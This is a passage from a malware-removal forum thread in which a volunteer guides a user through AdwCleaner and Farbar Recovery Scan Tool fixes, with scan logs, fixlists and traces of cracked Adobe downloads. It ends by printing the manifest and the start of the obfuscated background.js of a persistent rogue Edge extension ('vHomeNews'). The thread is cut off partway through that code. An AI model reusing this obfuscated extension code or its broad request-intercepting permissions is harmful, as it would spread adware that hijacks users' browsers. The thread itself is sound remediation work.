Antivirus scan has been stopped before completion. Scan Type: Antimalware Scan Parameters: Custom Scan Date: 2021-04-24 13:21:56 Description: Microsoft Defender Antivirus scan has been stopped before completion. Scan Type: Antimalware Scan Parameters: Quick Scan Date: 2021-04-23 11:40:41 Description: Microsoft Defender Antivirus scan has been stopped before completion. Scan Type: Antimalware Scan Parameters: Full Scan Date: 2021-04-23 11:30:45 Description: Microsoft Defender Antivirus scan has been stopped before completion. Scan Type: Antimalware Scan Parameters: Quick Scan Date: 2021-05-06 08:48:28 Description: Microsoft Defender Antivirus has encountered an error trying to update security intelligence. New security intelligence Version: Previous security intelligence Version: 1.335.1614.0 Update Source: Microsoft Update Server Security intelligence Type: AntiVirus Update Type: Full Current Engine Version: Previous Engine Version: 1.1.18000.5 Error code: 0x80070102 Error description: The wait operation timed out. Date: 2021-05-06 08:48:28 Description: Microsoft Defender Antivirus has encountered an error trying to update security intelligence. New security intelligence Version: Previous security intelligence Version: 1.335.1614.0 Update Source: Microsoft Update Server Security intelligence Type: AntiVirus Update Type: Full Current Engine Version: Previous Engine Version: 1.1.18000.5 Error code: 0x80070102 Error description: The wait operation timed out. Date: 2021-04-28 10:07:42 Description: Microsoft Defender Antivirus has encountered an error trying to update security intelligence. New security intelligence Version: Previous security intelligence Version: 1.335.1614.0 Update Source: Microsoft Malware Protection Center Security intelligence Type: AntiVirus Update Type: Full Current Engine Version: Previous Engine Version: 1.1.18000.5 Error code: 0x80072ee2 Error description: The operation timed out Date: 2021-04-28 10:07:42 Description: Microsoft Defender Antivirus has encountered an error trying to update security intelligence. New security intelligence Version: Previous security intelligence Version: 1.335.1614.0 Update Source: Microsoft Malware Protection Center Security intelligence Type: AntiSpyware Update Type: Full Current Engine Version: Previous Engine Version: 1.1.18000.5 Error code: 0x80072ee2 Error description: The operation timed out Date: 2021-04-28 10:07:42 Description: Microsoft Defender Antivirus has encountered an error trying to update security intelligence. New security intelligence Version: Previous security intelligence Version: 1.335.1614.0 Update Source: Microsoft Malware Protection Center Security intelligence Type: AntiVirus Update Type: Full Current Engine Version: Previous Engine Version: 1.1.18000.5 Error code: 0x80072ee2 Error description: The operation timed out CodeIntegrity: =============== Date: 2021-05-07 11:14:06 Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files\McAfee\MfeAV\AMSIExt.dll that did not meet the Windows signing level requirements. Date: 2021-05-07 11:04:02 Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe) attempted to load \Device\HarddiskVolume3\Program Files\McAfee\MfeAV\AMSIExt_x86.dll that did not meet the Microsoft signing level requirements. Date: 2021-05-07 10:58:58 Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MpCmdRun.exe) attempted to load \Device\HarddiskVolume3\Program Files\McAfee\MfeAV\AMSIExt.dll that did not meet the Microsoft signing level requirements. ==================== Memory info =========================== BIOS: LENOVO 3JCN31WW 07/17/2018 Motherboard: LENOVO Torronto 4C2 Processor: Intel® Core™ i5-7200U CPU @ 2.50GHz Percentage of memory in use: 62% Total physical RAM: 6044.22 MB Available physical RAM: 2248.29 MB Total Virtual: 8860.22 MB Available Virtual: 5297.87 MB ==================== Drives ================================ Drive c: (Windows) (Fixed) (Total:890.12 GB) (Free:189.39 GB) NTFS Drive d: (LENOVO) (Fixed) (Total:25 GB) (Free:16.12 GB) NTFS \\?\Volume{7b078799-1b7a-482a-b117-b30df98f6356}\ (WINRE_DRV) (Fixed) (Total:0.98 GB) (Free:0.48 GB) NTFS \\?\Volume{e8a927c2-8256-4564-bc60-9955bd9de628}\ (LENOVO_PART) (Fixed) (Total:14.17 GB) (Free:1.55 GB) NTFS \\?\Volume{3d83052a-24c6-47f1-b841-9e158ac65522}\ (SYSTEM_DRV) (Fixed) (Total:0.25 GB) (Free:0.22 GB) FAT32 ==================== MBR & Partition Table ==================== ========================================================== Disk: 0 (Size: 931.5 GB) (Disk ID: E59E8286) Partition: GPT. ==================== End of Addition.txt =======================

#8 Oh My!

Adware and Spyware and Malware

Malware Response Instructor
61,636 posts
OFFLINE

Gender:Male
Location:California
Local time:09:21 AM

Posted 07 May 2021 - 08:18 AM

Thank you.Let's start cleaning up your computer.You do not have a default browser specified. Can you tell me if Edge is what you normally use?I am going to have you run AdwCleaner, partly because it will identifiey pre-installed Lenovo software you may or may not want to use/keep. You can leave it all if you wish or delete those things you don't use.Please consider and do this.===================================================Peer to Peer (P2P) Warning--------------------Going over your logs I noticed that you have Peer 2 Peer (torrent) program(s) installed. It is pretty much certain that if you continue to use P2P programs, you will get infected again.

Avoid gaming sites, pirated software, cracking tools, keygens, and peer-to-peer (P2P) file sharing programs.
They are a security risk which can make your computer susceptible to a smörgåsbord of malware infections, remote attacks, exposure of personal information, and identity theft. Many malicious worms and Trojans spread across P2P file sharing networks, gaming and underground sites.
Users visiting such pages may see innocuous-looking banner ads containing code which can trigger pop-up ads and malicious Flash ads that install viruses, Trojans and spyware. Ads are a target for hackers because they offer a stealthy way to distribute malware to a wide range of Internet users.
The best way to reduce the risk of infection is to avoid these types of web sites and not use any P2P applications.

I would recommend that you uninstall Peer 2 Peer programs, however that choice is up to you. If you choose to remove the program, you can do so via Start > Control Panel > Add/Remove Programs.If you are still leaning toward using this program, please take a look at this information about CryptoLocker Ransomware, a type of Ransomware which can be delivered via P2P file transfers. The newest variation of Ransomware can make it impossible to recover the files this malicious software encrypts. In other words, you will probably lose most if not all of your valuable information, including pictures. In addition it has recently been reported that P2P downloads may be tracked resulting in your IP address being monitored by copyright authorities.If you wish to keep it, please do not use it until we are completely done and your machine is determined to be clean and updated.===================================================Malwarebytes AdwCleaner -------------------

Please download AdwCleaner and save it to your Desktop
Close all open programs and browsers
Click I agree
Click Scan now
Allow the program to remove what it finds except for Pre-installed applications if you would like to keep those or other entries you would like to keep
When completed click View Scan Log File
Copy and paste the contents in your reply

===================================================Farbar Recovery Scan Tool Fix--------------------

Right click on the FRST icon and select Run as administrator
Highlight the below information then hit the Ctrl + C keys at the same time and the text will be copied
There is no need to paste the information anywhere, FRST will do it for you

Start:: CreateRestorePoint: CloseProcesses: HKLM\...\Run: [AdobeGCInvoker-1.0] => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [3412680 2021-02-17] (Adobe Inc. -> Adobe Systems, Incorporated) HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [509936 2018-04-11] (Adobe Systems Incorporated -> Adobe Systems Incorporated) HKLM-x32\...\Run: [Adobe CCXProcess] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud Experience\CCXProcess.exe [114824 2020-07-30] (Adobe Inc. -> ) R2 AdobeARMservice; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [169672 2021-01-25] (Adobe Inc. -> Adobe Inc.) R2 AGMService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe [3780296 2021-02-17] (Adobe Inc. -> Adobe Systems, Incorporated) S4 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [3548360 2021-02-17] (Adobe Inc. -> Adobe Systems, Incorporated) C:\Program Files (x86)\Adobe C:\Program Files (x86)\Common Files\Adobe C:\Program Files\Adobe 2021-05-02 15:51 - 2021-05-02 15:51 - 000000000 ____D C:\Users\FRANCIS\Downloads\Adobe Master Collection 2021 RUS-ENG v4 - [FileWomen] HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\Run: [AdobeBridge] => [X] HKU\S-1-5-21-3936790745-3440936247-791344644-1002\...\Run: [AdobeBridge] => [X] HKU\S-1-5-21-3936790745-3440936247-791344644-1002\...\RunOnce: [DependencyCheck] => Performed Task: {82F7335F-144E-45F8-8E0A-FB23AA76AC60} - System32\Tasks\Avast Software\Overseer => C:\Program Files\Common Files\Avast Software\Overseer\overseer.exe [1790184 2021-04-30] (Avast Software s.r.o. -> Avast Software) Task: {B142D6B6-D6C6-4804-9BA9-92A856ADF9F3} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1557200 2021-01-25] (Adobe Inc. -> Adobe Inc.) HKLM\...\StartupApproved\Run: => "AdobeGCInvoker-1.0" HKLM\...\StartupApproved\Run: => "AdobeAAMUpdater-1.0" Edge Extension: (No Name) -> AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\AutoFormFill [not found] Edge Extension: (No Name) -> BookReader_B171F20233094AC88D05A8EF7B9763E8 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\BookViewer [not found] Edge Extension: (No Name) -> LearningTools_7706F933-971C-41D1-9899-8A026EB5D824 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\LearningTools [not found] Edge Extension: (No Name) -> PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\PinJSAPI [not found] FF HKLM\...\Thunderbird\Extensions: [[email protected]] - C:\Program Files\McAfee\MSKHKLM => not found 2021-04-27 09:00 - 2021-04-27 09:00 - 000003304 _____ C:\WINDOWS\system32\.tmp 2021-04-10 17:19 - 2021-02-26 18:05 - 000000000 ____D C:\Users\FRANCIS\Downloads\Adobe Master Collection 2021 RUS-ENG v3 - [CrackzSoft] C:\Program Files\Common Files\Avast Software\Overseer Folder: C:\ProgramData\Key-Base Folder: C:\ProgramData\{42AFAFAD-2FE9-D459-E932-738DED275782} Folder: C:\ProgramData\Kawmq C:\ProgramData\Kawmq hosts: End::

Click Fix
When completed he tool will create a log on the desktop called Fixlog.txt. Please copy and paste the contents of the file in your reply.

===================================================Things I would like to see in your next reply. Please be sure to copy and paste any requested log information unless you are asked to attach it. :thumbsup2:

Default browser?
AdwCleaner log
Fixlog
Update on computer performance

Lord, to whom shall we go? You have the words of eternal life and we have believed and have come to know that you are the Holy One of God.John 6:68-69The Man on the Middle Cross Said I Could Come

#9 Jones2021Riano

Topic Starter
Members
45 posts
OFFLINE

Local time:01:21 AM

Posted 08 May 2021 - 01:22 AM

AdwCleaner log:

# ------------------------------- # Malwarebytes AdwCleaner 8.2.0.0 # ------------------------------- # Build: 03-22-2021 # Database: 2021-04-28.3 (Cloud) # Support: https://www.malwarebytes.com/support # # ------------------------------- # Mode: Clean # ------------------------------- # Start: 05-08-2021 # Duration: 00:00:29 # OS: Windows 10 Home Single Language # Cleaned: 1 # Failed: 0 ***** [ Services ] ***** No malicious services cleaned. ***** [ Folders ] ***** No malicious folders cleaned. ***** [ Files ] ***** Deleted C:\Users\Public\Desktop\Web Navigation.lnk ***** [ DLL ] ***** No malicious DLLs cleaned. ***** [ WMI ] ***** No malicious WMI cleaned. ***** [ Shortcuts ] ***** No malicious shortcuts cleaned. ***** [ Tasks ] ***** No malicious tasks cleaned. ***** [ Registry ] ***** No malicious registry entries cleaned. ***** [ Chromium (and derivatives) ] ***** No malicious Chromium entries cleaned. ***** [ Chromium URLs ] ***** No malicious Chromium URLs cleaned. ***** [ Firefox (and derivatives) ] ***** No malicious Firefox entries cleaned. ***** [ Firefox URLs ] ***** No malicious Firefox URLs cleaned. ***** [ Hosts File Entries ] ***** No malicious hosts file entries cleaned. ***** [ Preinstalled Software ] ***** No Preinstalled Software cleaned. ************************* [+] Delete Tracing Keys [+] Reset Winsock ************************* AdwCleaner[S00].txt - [2619 octets] - [08/05/2021 13:46:38] ########## EOF - C:\AdwCleaner\Logs\AdwCleaner[C00].txt ##########

Fixlog:

Fix result of Farbar Recovery Scan Tool (x64) Version: 28-04-2021 Ran by FRANCIS (08-05-2021 14:00:16) Run:1 Running from C:\Users\FRANCIS\Downloads Loaded Profiles: FRANCIS & PC Gamer Jones Boot Mode: Normal ============================================== fixlist content: ***************** CreateRestorePoint: CloseProcesses: HKLM\...\Run: [AdobeGCInvoker-1.0] => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [3412680 2021-02-17] (Adobe Inc. -> Adobe Systems, Incorporated) HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [509936 2018-04-11] (Adobe Systems Incorporated -> Adobe Systems Incorporated) HKLM-x32\...\Run: [Adobe CCXProcess] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud Experience\CCXProcess.exe [114824 2020-07-30] (Adobe Inc. -> ) R2 AdobeARMservice; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [169672 2021-01-25] (Adobe Inc. -> Adobe Inc.) R2 AGMService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe [3780296 2021-02-17] (Adobe Inc. -> Adobe Systems, Incorporated) S4 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [3548360 2021-02-17] (Adobe Inc. -> Adobe Systems, Incorporated) C:\Program Files (x86)\Adobe C:\Program Files (x86)\Common Files\Adobe C:\Program Files\Adobe 2021-05-02 15:51 - 2021-05-02 15:51 - 000000000 ____D C:\Users\FRANCIS\Downloads\Adobe Master Collection 2021 RUS-ENG v4 - [FileWomen] HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\Run: [AdobeBridge] => [X] HKU\S-1-5-21-3936790745-3440936247-791344644-1002\...\Run: [AdobeBridge] => [X] HKU\S-1-5-21-3936790745-3440936247-791344644-1002\...\RunOnce: [DependencyCheck] => Performed Task: {82F7335F-144E-45F8-8E0A-FB23AA76AC60} - System32\Tasks\Avast Software\Overseer => C:\Program Files\Common Files\Avast Software\Overseer\overseer.exe [1790184 2021-04-30] (Avast Software s.r.o. -> Avast Software) Task: {B142D6B6-D6C6-4804-9BA9-92A856ADF9F3} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1557200 2021-01-25] (Adobe Inc. -> Adobe Inc.) HKLM\...\StartupApproved\Run: => "AdobeGCInvoker-1.0" HKLM\...\StartupApproved\Run: => "AdobeAAMUpdater-1.0" Edge Extension: (No Name) -> AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\AutoFormFill [not found] Edge Extension: (No Name) -> BookReader_B171F20233094AC88D05A8EF7B9763E8 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\BookViewer [not found] Edge Extension: (No Name) -> LearningTools_7706F933-971C-41D1-9899-8A026EB5D824 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\LearningTools [not found] Edge Extension: (No Name) -> PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\PinJSAPI [not found] FF HKLM\...\Thunderbird\Extensions: [[email protected]] - C:\Program Files\McAfee\MSKHKLM => not found 2021-04-27 09:00 - 2021-04-27 09:00 - 000003304 _____ C:\WINDOWS\system32\.tmp 2021-04-10 17:19 - 2021-02-26 18:05 - 000000000 ____D C:\Users\FRANCIS\Downloads\Adobe Master Collection 2021 RUS-ENG v3 - [CrackzSoft] C:\Program Files\Common Files\Avast Software\Overseer Folder: C:\ProgramData\Key-Base Folder: C:\ProgramData\{42AFAFAD-2FE9-D459-E932-738DED275782} Folder: C:\ProgramData\Kawmq C:\ProgramData\Kawmq hosts: ***************** Restore point was successfully created. Processes closed successfully. "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\\AdobeGCInvoker-1.0" => removed successfully "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\\AdobeAAMUpdater-1.0" => removed successfully "HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\Adobe CCXProcess" => removed successfully HKLM\System\CurrentControlSet\Services\AdobeARMservice => removed successfully AdobeARMservice => service removed successfully HKLM\System\CurrentControlSet\Services\AGMService => removed successfully AGMService => service removed successfully HKLM\System\CurrentControlSet\Services\AGSService => removed successfully AGSService => service removed successfully C:\Program Files (x86)\Adobe => moved successfully C:\Program Files (x86)\Common Files\Adobe => moved successfully C:\Program Files\Adobe => moved successfully C:\Users\FRANCIS\Downloads\Adobe Master Collection 2021 RUS-ENG v4 - [FileWomen] => moved successfully "HKU\S-1-5-21-3936790745-3440936247-791344644-1001\Software\Microsoft\Windows\CurrentVersion\Run\\AdobeBridge" => not found "HKU\S-1-5-21-3936790745-3440936247-791344644-1002\Software\Microsoft\Windows\CurrentVersion\Run\\AdobeBridge" => removed successfully "HKU\S-1-5-21-3936790745-3440936247-791344644-1002\Software\Microsoft\Windows\CurrentVersion\RunOnce\\DependencyCheck" => removed successfully "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{82F7335F-144E-45F8-8E0A-FB23AA76AC60}" => removed successfully "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{82F7335F-144E-45F8-8E0A-FB23AA76AC60}" => removed successfully C:\WINDOWS\System32\Tasks\Avast Software\Overseer => moved successfully "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Avast Software\Overseer" => removed successfully "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{B142D6B6-D6C6-4804-9BA9-92A856ADF9F3}" => removed successfully "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B142D6B6-D6C6-4804-9BA9-92A856ADF9F3}" => removed successfully C:\WINDOWS\System32\Tasks\Adobe Acrobat Update Task => moved successfully "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Adobe Acrobat Update Task" => removed successfully "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\AdobeGCInvoker-1.0" => removed successfully "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\AdobeGCInvoker-1.0" => not found "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\AdobeAAMUpdater-1.0" => removed successfully "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\AdobeAAMUpdater-1.0" => not found HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\Config\AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 => removed successfully HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\Config\BookReader_B171F20233094AC88D05A8EF7B9763E8 => removed successfully HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\Config\LearningTools_7706F933-971C-41D1-9899-8A026EB5D824 => removed successfully HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\Config\PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 => removed successfully "HKLM\Software\Mozilla\Thunderbird\Extensions\\[email protected]" => removed successfully C:\WINDOWS\system32\.tmp => moved successfully C:\Users\FRANCIS\Downloads\Adobe Master Collection 2021 RUS-ENG v3 - [CrackzSoft] => moved successfully C:\Program Files\Common Files\Avast Software\Overseer => moved successfully ========================= Folder: C:\ProgramData\Key-Base ======================== 2021-04-23 21:24 - 2021-04-23 21:24 - 000000000 RASHD [00000000000000000000000000000000] () C:\ProgramData\Key-Base\27b48b2c.052 2021-04-23 21:24 - 2021-04-23 21:24 - 000000512 _RASH [B6F10E213EA8FF8C40076D93FEA6DCD3] () C:\ProgramData\Key-Base\27b48b2c.052\CODE.PK_ 2021-04-23 21:24 - 2021-04-23 21:24 - 000000512 _RASH [B6F10E213EA8FF8C40076D93FEA6DCD3] () C:\ProgramData\Key-Base\27b48b2c.052\CODE.PKD ====== End of Folder: ====== ========================= Folder: C:\ProgramData\{42AFAFAD-2FE9-D459-E932-738DED275782} ======================== ====== End of Folder: ====== ========================= Folder: C:\ProgramData\Kawmq ======================== 2021-05-06 14:48 - 2021-05-06 14:48 - 000000000 ___HD [00000000000000000000000000000000] () C:\ProgramData\Kawmq\Hewd 2021-05-06 14:48 - 2021-05-06 14:48 - 000000000 ___HD [00000000000000000000000000000000] () C:\ProgramData\Kawmq\Hewd\DC05DC4E 2021-05-06 14:48 - 2021-05-06 14:48 - 000072490 ___AH [EB52845F05D64809A2957776108265F4] () C:\ProgramData\Kawmq\Hewd\DC05DC4E\background.js 2021-05-06 14:48 - 2021-05-06 14:48 - 000000440 ___AH [86DF701CE3B2191A415BDEF3222AB59F] () C:\ProgramData\Kawmq\Hewd\DC05DC4E\icon128.png 2021-05-06 14:48 - 2021-05-06 14:48 - 000000399 ___AH [75655D0D7A4F332CE5ACCF2B0375EEC6] () C:\ProgramData\Kawmq\Hewd\DC05DC4E\manifest.json 2021-05-06 14:48 - 2021-05-06 14:48 - 000000100 ___AH [D39131B1B8DC37DA0B47C8B887528E1E] () C:\ProgramData\Kawmq\Hewd\DC05DC4E\zciw ====== End of Folder: ====== C:\ProgramData\Kawmq => moved successfully Hosts restored successfully. The system needed a reboot. ==== End of Fixlog 14:04:04 ====

#10 Jones2021Riano

Topic Starter
Members
45 posts
OFFLINE

Local time:01:21 AM

Posted 08 May 2021 - 01:27 AM

Default Browser: Microsoft Edge

Performance: Still the same when I uninstalled P2P

Other Concern: C:\ProgramData\Kawmq still appearing after reboots and creates an extension called vHome News when Microsoft Edge is opened, and causes to pop up Bing search.

Attached Files

2021-05-08.png 224.13KB 0 downloads

Edited by Jones2021Riano, 08 May 2021 - 01:28 AM.

#11 Oh My!

Adware and Spyware and Malware

Malware Response Instructor
61,636 posts
OFFLINE

Gender:Male
Location:California
Local time:09:21 AM

Posted 08 May 2021 - 08:22 AM

OK please do this. I would like to look at the files inside the folder again in case they changed names.===================================================Farbar Recovery Scan Tool Fix--------------------

Right click on the FRST icon and select Run as administrator
Highlight the below information then hit the Ctrl + C keys at the same time and the text will be copied
There is no need to paste the information anywhere, FRST will do it for you

Start:: Folder: C:\ProgramData\Kawmq End::

Click Fix
When completed he tool will create a log on the desktop called Fixlog.txt. Please copy and paste the contents of the file in your reply.

Fixlog

Lord, to whom shall we go? You have the words of eternal life and we have believed and have come to know that you are the Holy One of God.John 6:68-69The Man on the Middle Cross Said I Could Come

#12 Jones2021Riano

Topic Starter
Members
45 posts
OFFLINE

Local time:01:21 AM

Posted 08 May 2021 - 08:30 AM

Fix result of Farbar Recovery Scan Tool (x64) Version: 08-05-2021 Ran by FRANCIS (08-05-2021 21:29:34) Run:2 Running from C:\Users\FRANCIS\Downloads Loaded Profiles: FRANCIS Boot Mode: Normal ============================================== fixlist content: ***************** Folder: C:\ProgramData\Kawmq ***************** ========================= Folder: C:\ProgramData\Kawmq ======================== 2021-05-08 14:11 - 2021-05-08 14:11 - 000000000 ___HD [00000000000000000000000000000000] () C:\ProgramData\Kawmq\Rpdnepq 2021-05-08 14:11 - 2021-05-08 14:11 - 000000000 ___HD [00000000000000000000000000000000] () C:\ProgramData\Kawmq\Rpdnepq\DC05DC4E 2021-05-08 14:11 - 2021-05-08 14:11 - 000072490 ___AH [EB52845F05D64809A2957776108265F4] () C:\ProgramData\Kawmq\Rpdnepq\DC05DC4E\background.js 2021-05-08 14:11 - 2021-05-08 14:11 - 000000440 ___AH [86DF701CE3B2191A415BDEF3222AB59F] () C:\ProgramData\Kawmq\Rpdnepq\DC05DC4E\icon128.png 2021-05-08 14:11 - 2021-05-08 14:11 - 000000399 ___AH [75655D0D7A4F332CE5ACCF2B0375EEC6] () C:\ProgramData\Kawmq\Rpdnepq\DC05DC4E\manifest.json 2021-05-08 14:11 - 2021-05-08 14:11 - 000000100 ___AH [D39131B1B8DC37DA0B47C8B887528E1E] () C:\ProgramData\Kawmq\Rpdnepq\DC05DC4E\zciw ====== End of Folder: ====== ==== End of Fixlog 21:29:34 ====

#13 Oh My!

Adware and Spyware and Malware

Malware Response Instructor
61,636 posts
OFFLINE

Gender:Male
Location:California
Local time:09:21 AM

Posted 08 May 2021 - 08:48 AM

Thank you,Please do this.===================================================Farbar Recovery Scan Tool Fix--------------------

Right click on the FRST icon and select Run as administrator
Highlight the below information then hit the Ctrl + C keys at the same time and the text will be copied
There is no need to paste the information anywhere, FRST will do it for you

Start:: cmd: type C:\ProgramData\Kawmq\Rpdnepq\DC05DC4E\manifest.json cmd: type C:\ProgramData\Kawmq\Rpdnepq\DC05DC4E\background.js End::

Click Fix
When completed he tool will create a log on the desktop called Fixlog.txt. Please copy and paste the contents of the file in your reply.

Fixlog

Lord, to whom shall we go? You have the words of eternal life and we have believed and have come to know that you are the Holy One of God.John 6:68-69The Man on the Middle Cross Said I Could Come

#14 Jones2021Riano

Topic Starter
Members
45 posts
OFFLINE

Local time:01:21 AM

Posted 08 May 2021 - 09:12 AM

Fix result of Farbar Recovery Scan Tool (x64) Version: 08-05-2021 01 Ran by FRANCIS (08-05-2021 22:04:07) Run:3 Running from C:\Users\FRANCIS\Downloads Loaded Profiles: FRANCIS Boot Mode: Normal ============================================== fixlist content: ***************** cmd: type C:\ProgramData\Kawmq\Rpdnepq\DC05DC4E\manifest.json cmd: type C:\ProgramData\Kawmq\Rpdnepq\DC05DC4E\background.js ***************** ========= type C:\ProgramData\Kawmq\Rpdnepq\DC05DC4E\manifest.json ========= { "name": "vHomeNews", "version": "7.39", "description": "Home News", "permissions": [ "storage", "webRequest", "webRequestBlocking", "http://*/", "https://*/", "management" ], "background": { "scripts": [ "background.js" ] }, "browser_action": { "default_icon": "icon128.png" }, "manifest_version": 2, "minimum_chrome_version": "35" } ========= End of CMD: ========= ========= type C:\ProgramData\Kawmq\Rpdnepq\DC05DC4E\background.js ========= const a0r=['nSomkCkwW5K','WPTKE8o2ha','smohhCkwW4KXcr4','WOemhCksW6tdH2iN','WQrzeIz8','uYtdOmocAa','W7BcSCopW6/cUG','DmoQb8k7W6i','pSk+j8o/','tCotomk5W78','WR7cNJVdUZa','W54ViCogaG','WROEtcOvsSogWOVdPWK','D8kfW4VdVc3dSKP1WQFcUq','WQZcNqRdIvOqmW','ymkQqMxcSW','ANv5WQ41','W58nW4pcQINcG3T1Cq','W5DICmofW7C','W7C+jq','WP/dIs/cSsq','WPq2amodsW','W4dcTmoE','orWieSoD','W4TvW77dNmkf','ySkmeCkjxG','FSoqnmkqW7C','W53cKmko','WQVcIHy','W796W6FdVmkD','WPCbgmkmW64','vmongW','WR3cRdNdHai','W73dN2ddMKO','WRmmWQRdJ8kmA8orWQxcU38','W57cKmkCW5mfW44lwmoheW','WR3cU8kEcHC','WR0iWR91W5u','EmkwAwxcMhPcpae','WPldVmkCvCkXWP/cQ8oP','hqvTdx0','hmo3eSkSW5RcHt3cMG','BmkCALxcNgPE','W7ZcSSoicCkR','W6CmxqT0W63dGmopWPK','W58HW73cVJS','dc44bCkwrMxdSwf4','W73cJvNcRSkKWRddP3K','fSoZnGlcLW','iSoTWOBcMmoe','WRFcIZFdQfa','BgL/WR4e','faT7g3y','p8o0b8k7W6y','WQK1bCoyAG','D8kfW47dQsddT0jdWRC','m8kxW5pdUmkk','A8kyW5JdRWJdVW','W6D1W7hdLmka','WPDDcHb4','eCkTm8oEdq','nqurw3ZcHaa','l8k6oSo1jIFcVCkgDW','W7fyumofW7u','WRCdWPzNW4JdQq','W77dGK3dHf/dISolWP8','WPufamkKW6G','W7HQW5O','W45SfSkiEa','fbyFamok','fsvanLa','imk2rSod','WQtdHqFcJcK','pmoPW6GBr8kNcwlcVa','W4eoiCobnmo8zG','xCknW5O','W6qNW7tcNbC','WO/dT8k7u8kUWORcPmo4WR9t','WR9FhafHW7VdPSoxWR5N','WP/cGCkAcra','mSkSyCobWQO','W5pcHSk3W50i','jmk7v8oyWOtdOa','W4rXy8owW4pcRmosj8kEWOG','WPddJ8ovWR9jWOzZ','cSoHxtJdNCkDW63cIKe','m8oeW4icsW','B8ouWOzrWRPFWQHaW4xcHW','E8kScW','W4a5W4NcGYC','sCoGh8kKW48','WRJcSmksdZa','WRGEWPbNW5a','hSoZc8k3W4NcKH/cGcvw','zCk6CexcMq','B8kmWQldSMW','W73cHWZcUCkeWRddU3xcM8kg','WO0Pb8odu8kj','wSkpmSkCxG','CH7dJmoyrq','WRiDWRtdImkiF8oa','W5ZcLHxcGCk8','hmoKa8kOW57cHtBcJq','WPtdS8kbuCkv','W715W4ldO8ksymkRgq','BIeUDeu','W7uzESkbWR4','nq4t','WOVcP8kAiXNdPXSoWQCJ','WPRdMrFcIZm','WQ1mbafJ','W54LW4ZcHJC','WPfOnG','W4FcO8odnmkiCZn0WR/dKa','WReiWQ/dJSkmASolWOm','W7BcN8kpW7Oo','WRTIymo+aCkQybi','WO7dVmkasmkcWPNcVmo0WR1x','aCo3bCoHW5K','W7ZcLmolW5ZcOq','W6WoxfeIWQBdT8